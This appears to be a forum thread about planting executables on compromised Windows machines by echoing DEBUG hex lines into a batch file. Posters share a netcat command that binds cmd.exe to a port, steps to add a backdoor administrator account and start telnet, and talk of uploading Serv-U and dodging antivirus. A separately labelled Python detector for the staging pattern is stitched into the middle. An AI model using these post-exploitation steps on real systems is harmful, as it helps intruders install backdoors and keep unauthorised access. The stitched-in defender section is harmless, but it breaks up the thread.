101
//EDIT: see page 8, better ftp.txt posted.

I recommend using a tool like SecureCRT, SSH1-2, Telnet Client (faster to copy/paste the huge .txt).
Copy paste all into SecureCRT, it creates ftp.bat, then run ftp.bat, it will create ftp.exe.
Nb: I packed ftp.exe to make the debugging smaller.
See page 2 to dl ftp.bat to test locally if you are too lazy to mod the txt.
Of course for the guys who dunno, ftp.exe here is an example, you can update to another executable.

the .txt is also attached to the thread at the bottom.
Tested on 9x/XP

//EDIT: 2k was bugging, sorry my mistake, fixed version see page 8.

njoy this example ;P

CODE

ECHO @ECHO OFF^>1>ftp.bat
ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat
ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>

etc.. etc ... 1096 lines .. too big for the threads .. look at the attached file


NOW SOME SMALL TIPS

TIP1: That's easy to use SecureCRT in binding mode, you just have to connect with a telnet method the port, then copy paste all the txt at 1 time.
But in listening ?

your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT, do a simple telnet connection on 192.168.0.2:12345 (you'll have a shell of course on your own computer through SecureCRT)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawns a shell to this netcat2 ;p

TIP2:
You are on a system/admin rights shell without the possibility to copy paste the .txt ?

create a user

net user USER PASS /add
net localgroup Administrators USER /add

type tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, it will refuse.
type a second time tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, telnet server is now started without being enabled. (yes I tested it successfully)

login with your created USER/PASS.
You are now under a shell with Telnet & SecureCRT, that's a big step.

But because you use telnet, you'll have to copy paste the lines 10 per 10.
(I tested , it's not so long , and working)

I had finally a ftp.exe created with the help of a really bad shell at start.

***************

If you can't make it work nm, me I successfully used it on every box where ftp/tftp were missing. You need of course some resources in your brain to find a way to copy paste the huge txt in all situations.

I hope my resources helped you , bye wink.gif
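
For defenders, the staging described in the post above leaves a recognisable trace in command-line and shell-session logs: a run of DEBUG enter commands (e <addr> <bytes>) whose bytes begin with the MZ signature. The block below is an added example, not part of the thread or any poster's tool; it flags that pattern and recovers the written bytes so they can be hashed. The names rebuild and assess and the min_enters threshold are assumptions, and the debug line and the benign lines in the sample are constructed.

```python
import re

# One DEBUG "enter" command: e <addr> <byte> <byte> ...
ENTER = re.compile(r"\be\s+([0-9a-f]{3,4})((?:\s+[0-9a-f]{2}\b)+)", re.I)
# DEBUG fed from a redirected script file
DEBUG_RUN = re.compile(r"\bdebug(?:\.exe)?\s*<\s*\S+", re.I)


def rebuild(lines):
    """Reassemble bytes from enter commands (address 0x100 = image offset 0)."""
    image, count = bytearray(), 0
    for line in lines:
        m = ENTER.search(line)
        if not m or int(m.group(1), 16) < 0x100:
            continue
        off = int(m.group(1), 16) - 0x100
        data = bytes.fromhex("".join(m.group(2).split()))
        image.extend(b"\x00" * max(0, off + len(data) - len(image)))
        image[off:off + len(data)] = data
        count += 1
    return bytes(image), count


def assess(lines, min_enters=3):
    """Summarise a captured transcript; min_enters is an assumed threshold."""
    image, count = rebuild(lines)
    is_exe = image[:2] == b"MZ"
    # e_lfanew (offset 0x3C) points at the PE header once 0x40 bytes exist
    lfanew = int.from_bytes(image[0x3C:0x40], "little") if len(image) >= 0x40 else None
    return {
        "enter_commands": count,
        "bytes_recovered": len(image),
        "mz_header": is_exe,
        "e_lfanew": lfanew,
        "debug_invoked": any(DEBUG_RUN.search(l) for l in lines),
        "alert": is_exe and count >= min_enters,
    }


# First four lines: the excerpt quoted in the post. Last line: constructed.
SAMPLE = [
    r"ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat",
    r"ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat",
    r"ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat",
    r"ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>",
    r"debug < 1",
]
# Constructed benign lines that must not alert.
BENIGN = ["echo build finished>>build.log", "dir e 0100", "type e 0100 notes"]
```

Calling assess(SAMPLE) reports the four enter commands, the MZ header and the PE header offset; assess(BENIGN) raises no alert.
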
sylver
cool what a nice method rolleyes.gif rolleyes.gif
stonebreaker
wonderful
thanks for share it
archiv
nice method thx ....
but where can me dl the tool for faster copy/past ?! tongue.gif

thx
eXist
Finding it on google isn't hard:
hxxp://www.vandyke.com/products/securecrt/index.html
Seek and you shall find what you're after.

Interesting method 101, not sure how practical it would be, interesting none the less.
Zyne
This definitely seems like a nice "util"...

I'm gonna give it a test on my own machine, just to see what it does exactly... smile.gif



Thanks a lot for putting this together, and sharing this with us m8!



Zyne
temptation
Hi, thx for this, but i dunno how it works ...
I tried to rename the ftp.txt to ftp1.bat and executed it but it was not workin .. an idea?

[EDIT]
Ok, now it is workin, sry i was 2 dumb 4 it :/
BuzzDee
yes this method is nice!

i'm using it quite long now smile.gif

but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp wink.gif

that way u never have probs with uploading the files biggrin.gif

greetz

EzMe

Whow! Never thought this was possible.. Kewl gonna try it smile.gif
Lovellz
Thanks alot for this class101.

annoying when u root a puter and they removed ftp.exe wink.gif

thanks alot matey biggrin.gif
boshcash
wow nice way man , its a bit complicated but its the best and i think this wont be ever detected by AVs
xzbit
big THX 101
for sharing this smile.gif
TwitcH
Methinks this could be useful.....
ZoraX
thnx biggrin.gif nice util:D
anybody tested that the ftp.exe works?
xDD
C:\WINNT\>ftp.exe
ftp.exe


C:\WINNT\>

hmmm


WOrk u ? : |
PeOun
thx a lot for this nice method smile.gif
xDD
Yeah this do fxp.exe but someone tested this ftp.exe and work ? :|
BuzzDee
of course it worx. tested it locally and remotely. both ways worked fine. y shouldnt it work? ^^
xDD
Mhmmm

i give this echo command

next ftp.bat run and execute ftp.exe and this file not work ... i will go testing again
101

The .txt is the way to create this .bat from a cmd line with ECHO commands.
here is the .bat if u wanna test directly on your computer.

so, this thread is not to teach u how to use ftp.exe ... u can also do it with list.exe, kill.exe , ur backdoor y not ;Q , ftp is just a helpful example for who need ;<
xDD
Yeah this bat work but i tested this echo command and i dont know but dont work but will testing again later :)
brOmstar
fine thx..tested it locally

the ftp.exe is created, but when i try to use that ftp.exe i get an error but only on my w2k german sp4 blink.gif

on a remote machine w2k3 server eng it had worked very well !

but who cares the method is the key thx ! biggrin.gif
boshcash
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that
MattMannLT
QUOTE (boshcash @ Mar 14 2004, 06:03 PM)
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that

i think you could just use any hex editor
easternerd
Innovation is the KeyWord
i really Congratulate 101 for
showing a very simple yet
impressive method where we
can take advantage of just
the Swiss Army Knife alone.
Erra
Nice idea.... will have to give it a go and see if I can get the thing working myself... like it though... good thinking!!
yopman
nice idea, i have already posted, it's the hex of an exe, and debug.exe, on all windows machines, "compiles" this to an exe. it doesn't work on nt40 machines. you can already use other apps, like cmdget.exe only 1.5kb, download files from http://*. you can convert exe to the hex-format with bin2src, then you must change the header, in the first line from .exe to a non-executable extension like sys, txt or other, because debug.exe "can't build an executable". after the compilation you change the *.txt to *.exe and you have a working exe.
BuzzDee
@yopman: r u sure that u can convert it with bin2src? i searched with google, downloaded it and i found out that i can only convert exe-file into c, basic or pascal code with it... but we need hex code ^^

@101: which program did u use to convert the exe? would be nice if u could tell us wink.gif

greetz,
buzz
brOmstar
after doing some research i found a handy tool called exe2hex

i would attach it here but here's no button to attach the file (cause i'm trial???)

found this in the board-helpsystem

If the admin has enabled it, you will also see a file attachments option, this will allow you to attach a file to be uploaded when making a post. Click the browse button to select a file from your computer to be uploaded. If you upload an image file, it may be shown in the content of the post, all other file types will be linked to.


???

btw. the tool works really perfect..very simple usage

exe2hex.exe inputfile outputfile
debug < outputfile

it shouldn't be a problem to create a bat or echo.txt based on the outputfile
x1`
clever stuff its like u programmed it in binary on the computer
wonder if u could do the same with servu or other apps smile.gif
how did u get the binary code for ftp.exe anyway?
brOmstar
u need the hex code of the file not the binary ...how to do ? read one post above blink.gif

btw this should work with any *.exe
G-Ryder
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u don't want the file to run you have to remove the extension when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be a lot smaller than ftp.exe so maybe it's quicker
101
the solution is maybe not so far,

njoy your research wink.gif


(nother example , creates list.exe, process listener)
iWeasel410
Wow this is interesting, nice find 101! But what advantages does this prove over other methods?
brOmstar
i have written a handy tool in c# together with exe2hex u now need some seconds
to create a createmyprogramm.bat ...

i have tested this method with nc.exe/ftp.exe/psinfo.exe works well =)

is it possible to allow me to attach files?

@iWeasel u don't have to upload anything !
Damned_Vampire
great work
thks for the info
Gotisch
Nice tool (hehe dry.gif ).

brOmstar send it to me ill attach it, or ask a mod to post the file for you.
yopman
i'm sorry bin2dbg
brOmstar
k gotisch i will send both tools to you (think tomorrow in the morning)... together with an explanation how to use them =)
fry
Thanx for the great info 101, that's some really great stuff, although br0mstar's program will be here soon and I can't add attachments either, but i'll add the website's link to the exe2hex program.

exe2hex compiled:http://www.g615.co.uk/riftor/exe2hex.exe

exe2hex C sourcecode:http://www.g615.co.uk/riftor/exe2hex.c

tongue.gif
poostew
this rocks.

biggrin.gif

The Storm
Very nice work! Gonna test it very helpful! Gonna try making a new method of breaking SQL_ERROR *g*
BigBen
Thx very nice worked fine biggrin.gif

Greetz

BigBen
FuzZyBeeR
Heh This always comes in handy smile.gif Thanx for this post! smile.gif Tested it and it worked indeed smile.gif
tribalgoa
very interesting method ...
will try it out asap and let you all know if it works
BuzzDee
thx alot yopman! that was the one i was looking for biggrin.gif

btw it worx with serv-u, too tongue.gif

nice nice nice...

greetz,
buzz
boshcash
i got exe2hex and everything worked fine , bromstar when u finish the program tell me to post it for u

Because programs automate many things, which are:

-adding echo to every line and output to selected batch name that u want to be created
-converting the exe to binary easily without command line
-adding the n filename.sys line (did u successfully do this or the file created requires manual edit ?)

Thanks alot for creator of this way , and when u get the program ready bromstar plz tell me
arn0ld
really useful
it's really sad.gif when there is not ftp.exe
( tested it and it works fine laugh.gif )
prog
I used to do this sort of thing with linux.
Glad nt has adapted it now.
tibbar
interesting idea. personally, ive never encountered a situation where tftp and ftp were both not available, but i'll keep this one in reserve for that rainy day.

Cheers m8